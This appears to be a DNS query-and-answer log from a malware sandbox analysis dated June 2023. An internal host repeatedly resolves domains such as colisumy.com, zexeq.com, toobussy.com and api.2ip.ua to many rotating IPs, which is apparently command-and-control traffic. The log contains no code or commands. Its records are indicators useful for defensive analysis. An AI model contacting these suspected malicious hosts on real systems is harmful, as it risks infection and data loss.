Jun 21, 2023 04:28:15.700376034 CEST	192.168.2.3	8.8.8.8	0x8519	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.195436001 CEST	192.168.2.3	8.8.8.8	0xe9d8	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.147996902 CEST	192.168.2.3	8.8.8.8	0xb0bc	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.356616020 CEST	192.168.2.3	8.8.8.8	0xe6f4	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.441356897 CEST	192.168.2.3	8.8.8.8	0x125	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.667126894 CEST	192.168.2.3	8.8.8.8	0x21d5	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.102447987 CEST	192.168.2.3	8.8.8.8	0xf5cb	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.636286974 CEST	192.168.2.3	8.8.8.8	0x1b4c	Standard query (0)	astoriaresidency.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.792320967 CEST	192.168.2.3	8.8.8.8	0x1aab	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.895879030 CEST	192.168.2.3	8.8.8.8	0xb80c	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.729116917 CEST	192.168.2.3	8.8.8.8	0xfde9	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.631202936 CEST	192.168.2.3	8.8.8.8	0xc20	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.837892056 CEST	192.168.2.3	8.8.8.8	0xe2d3	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.062728882 CEST	192.168.2.3	8.8.8.8	0x28de	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.787715912 CEST	192.168.2.3	8.8.8.8	0x81f3	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.657776117 CEST	192.168.2.3	8.8.8.8	0xb2ba	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.764484882 CEST	192.168.2.3	8.8.8.8	0x37e1	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.706413984 CEST	192.168.2.3	8.8.8.8	0x751c	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.693485975 CEST	192.168.2.3	8.8.8.8	0xe397	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.801557064 CEST	192.168.2.3	8.8.8.8	0xa264	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.147034883 CEST	192.168.2.3	8.8.8.8	0xc271	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.369884014 CEST	192.168.2.3	8.8.8.8	0xaa24	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.114428997 CEST	192.168.2.3	8.8.8.8	0x7461	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.651084900 CEST	192.168.2.3	8.8.8.8	0x9fc0	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:37.776592016 CEST	192.168.2.3	8.8.8.8	0xea6e	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jun 21, 2023 04:27:34.092746019 CEST	8.8.8.8	192.168.2.3	0x2faf	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.092746019 CEST	8.8.8.8	192.168.2.3	0x2faf	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	37.34.248.24	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	181.4.66.66	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	183.100.39.157	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	211.168.53.110	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	123.140.161.243	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.509438992 CEST	8.8.8.8	192.168.2.3	0x679a	No error (0)	colisumy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:37.641668081 CEST	8.8.8.8	192.168.2.3	0xae73	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:37.641668081 CEST	8.8.8.8	192.168.2.3	0xae73	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	37.34.248.24	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	181.4.66.66	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	183.100.39.157	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	211.168.53.110	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	123.140.161.243	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.148029089 CEST	8.8.8.8	192.168.2.3	0xcfdd	No error (0)	colisumy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.618746996 CEST	8.8.8.8	192.168.2.3	0x36f1	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:40.740710974 CEST	8.8.8.8	192.168.2.3	0x8603	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:40.740710974 CEST	8.8.8.8	192.168.2.3	0x8603	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:42.062480927 CEST	8.8.8.8	192.168.2.3	0xb70	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:42.062480927 CEST	8.8.8.8	192.168.2.3	0xb70	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:42.106261015 CEST	8.8.8.8	192.168.2.3	0xa9f1	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:42.613253117 CEST	8.8.8.8	192.168.2.3	0xeea8	No error (0)	astoriaresidency.com	103.233.24.19	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:44.348167896 CEST	8.8.8.8	192.168.2.3	0x69c9	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:44.393583059 CEST	8.8.8.8	192.168.2.3	0x1915	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:44.393583059 CEST	8.8.8.8	192.168.2.3	0x1915	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:47.544982910 CEST	8.8.8.8	192.168.2.3	0x23de	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:47.573810101 CEST	8.8.8.8	192.168.2.3	0x2a2c	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	123.140.161.243	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	37.34.248.24	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	181.4.66.66	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	183.100.39.157	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.163352013 CEST	8.8.8.8	192.168.2.3	0x3524	No error (0)	colisumy.com	211.168.53.110	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.572221041 CEST	8.8.8.8	192.168.2.3	0xd48b	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	123.140.161.243	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	37.34.248.24	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	181.4.66.66	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	183.100.39.157	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.937350988 CEST	8.8.8.8	192.168.2.3	0xb63c	No error (0)	colisumy.com	211.168.53.110	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:49.129025936 CEST	8.8.8.8	192.168.2.3	0x6b2	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:50.946419954 CEST	8.8.8.8	192.168.2.3	0x62c1	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	77.28.83.241	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	124.43.18.250	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	187.209.145.196	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	211.119.84.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	119.148.40.122	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.079938889 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	61.253.71.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	61.253.71.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	77.28.83.241	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	124.43.18.250	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	187.209.145.196	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	211.119.84.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.450022936 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	119.148.40.122	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	61.253.71.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	77.28.83.241	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	124.43.18.250	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	187.209.145.196	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	211.119.84.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.670754910 CEST	8.8.8.8	192.168.2.3	0x68f1	No error (0)	zexeq.com	119.148.40.122	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:53.729806900 CEST	8.8.8.8	192.168.2.3	0x3e6b	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:53.729806900 CEST	8.8.8.8	192.168.2.3	0x3e6b	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:56.112798929 CEST	8.8.8.8	192.168.2.3	0xf2e	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:56.195426941 CEST	8.8.8.8	192.168.2.3	0xcace	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:01.157757998 CEST	8.8.8.8	192.168.2.3	0x99ac	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:01.157757998 CEST	8.8.8.8	192.168.2.3	0x99ac	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:01.427962065 CEST	8.8.8.8	192.168.2.3	0x11a9	No error (0)	astoriaresidency.com	103.233.24.19	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:01.472888947 CEST	8.8.8.8	192.168.2.3	0x756e	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:04.724128962 CEST	8.8.8.8	192.168.2.3	0xdbc0	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:05.593142033 CEST	8.8.8.8	192.168.2.3	0x3ac6	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:12.822160959 CEST	8.8.8.8	192.168.2.3	0x272d	No error (0)	potunulit.org	188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:12.822160959 CEST	8.8.8.8	192.168.2.3	0x272d	No error (0)	potunulit.org	188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.157572985 CEST	8.8.8.8	192.168.2.3	0x6018	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.987803936 CEST	8.8.8.8	192.168.2.3	0x58ed	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	211.168.53.110	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	123.140.161.243	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	37.34.248.24	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	181.4.66.66	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.089849949 CEST	8.8.8.8	192.168.2.3	0x4cf9	No error (0)	colisumy.com	183.100.39.157	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.739299059 CEST	8.8.8.8	192.168.2.3	0x339e	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:15.426867962 CEST	8.8.8.8	192.168.2.3	0xbdce	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:15.679641008 CEST	8.8.8.8	192.168.2.3	0x57a7	No error (0)	shsplatform.co.uk	80.66.203.53	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	183.100.39.157	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	211.168.53.110	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	123.140.161.243	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	37.34.248.24	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	181.4.66.66	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.015748024 CEST	8.8.8.8	192.168.2.3	0x8519	No error (0)	colisumy.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
